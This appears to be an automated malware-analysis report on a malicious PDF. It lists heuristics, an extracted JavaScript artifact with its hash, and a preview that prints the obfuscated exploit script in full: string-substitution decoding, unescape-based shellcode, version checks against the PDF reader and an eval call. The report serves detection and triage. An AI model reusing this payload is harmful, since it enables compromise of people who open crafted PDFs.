Verdict: MALICIOUS
Risk Score: 148
MITRE ATT&CK: T1059.001 PowerShell

Malware Insights
The PDF file contains embedded and obfuscated JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The presence of a PDF_EVAL heuristic firing suggests the script uses eval() to execute its content, a common technique for obfuscation and payload delivery. The script is likely designed to download and execute a second-stage payload. No specific family could be identified.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics (4)

- JavaScript action (low, 2 related findings) PDF_JAVASCRIPT: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical) PDF_JS_EXPLOIT_CLUSTER: PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior. Matched line in script:
O="%uFFFF% );var barb[ sil4 %u0 %u functio (){var ;var daru bas 6 .length 408B =unes mech n 7 .charA cape( =new boom c0c 8B Array( nog( , while solo 2e C 24 D0FF tring( smotr heap 3 ); 0x40000 ( 0]== DB33 ;} E8 5 1]<1) 2f 16 krik t( ar 9090 koli oll FF 3 EB 0 865 u kupl ){ zlos no EB F5 4 40 83 52".split(' ');Q=" stYt Yr L ! #( *2< +=P = .subsG0, /2Lreturn P W ^=0x0 0 p='R4 ', c=' 5 ' H=' 3?3574 378R6 6K2~33 49C9 AD41O F36 14BE 3828 4F2 C108 DCB DA0q4~3BEF … -
- Embedded JS stream (low) PDF_JS: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact (info) EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0013_001.js | pdf-javascript-stream | PDF /JS object 13 at offset 0x35E | 1295 bytes |

SHA-256: fbe6924bb337d34c9a60deba662dcd3144c77bc3a7761b8d889271c558309d02

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token(s))

Preview script (first 1,000 lines of the extracted script):
O="%uFFFF% );var barb[ sil4 %u0 %u functio (){var ;var daru bas 6 .length 408B =unes mech n 7 .charA cape( =new boom c0c 8B Array( nog( , while solo 2e C 24 D0FF tring( smotr heap 3 ); 0x40000 ( 0]== DB33 ;} E8 5 1]<1) 2f 16 krik t( ar 9090 koli oll FF 3 EB 0 865 u kupl ){ zlos no EB F5 4 40 83 52".split(' ');Q=" stYt Yr L ! �#( *2< � +=P = .subsG0, /2Lreturn P W ^=0x0 0 �p='R4�',�c=' 5 ' H=' 3?3574 378R6� 6K2~33� 49C9 AD41O F36 14BE 3828 4F2 C108 DCB DA0q4~3BEF 5DFREE7REK24 6DD C 4B 1C5E DD03 4K C3C5 275 D6C E6F 42E C6?4300RC3A>55 065 C033 36�30� C78 0?1C7~ AD 8� 9� 8D34 C� 953?8�F E4EQE?`84�EC� �0�242?`3?95D~B�~1A36 02F FE8� ` 245�8DF?BA�OR35q�R3@ B�D FE98 E8AR3E8��` 4E?2C� 2@ �F E2D8Q73 `��`�QD~`D7�7468 07�2f3a 3Ue 56b c2d>70 16e f72>64 572 cUf 564>72 %' $ �p+�c+H+ u0065 000 �=$ *2 J=M0 =J-(�+0x38 ZZ L =! �=(^-M0)/J;for(vY =0; <�; ++�Yr[ ]= +$;}} gYa =app.viewerVersion.toSGL = .replace(/ D/g,'' bYb X0),X1),X2)Lif(N8&&(( 1]==1&& 2]<2)||T)||N7&&T||( 0]<7)�W( L#( <449�) += ;this.c_abStore=C_ab.c_ectEmailInfo({subj: ,msg: }L}} gYa(L}";o=" !#$>?@GHJKLMNOPQRTUWXYZ^_`q~ �����������";for(J=64;J>-1;J--)Q=Q.split(o.charAt(J)).join(O[J]);eval(Q.replace(/ /g,'"').replace(/ /g,"\\").replace(/ /g,"\n"));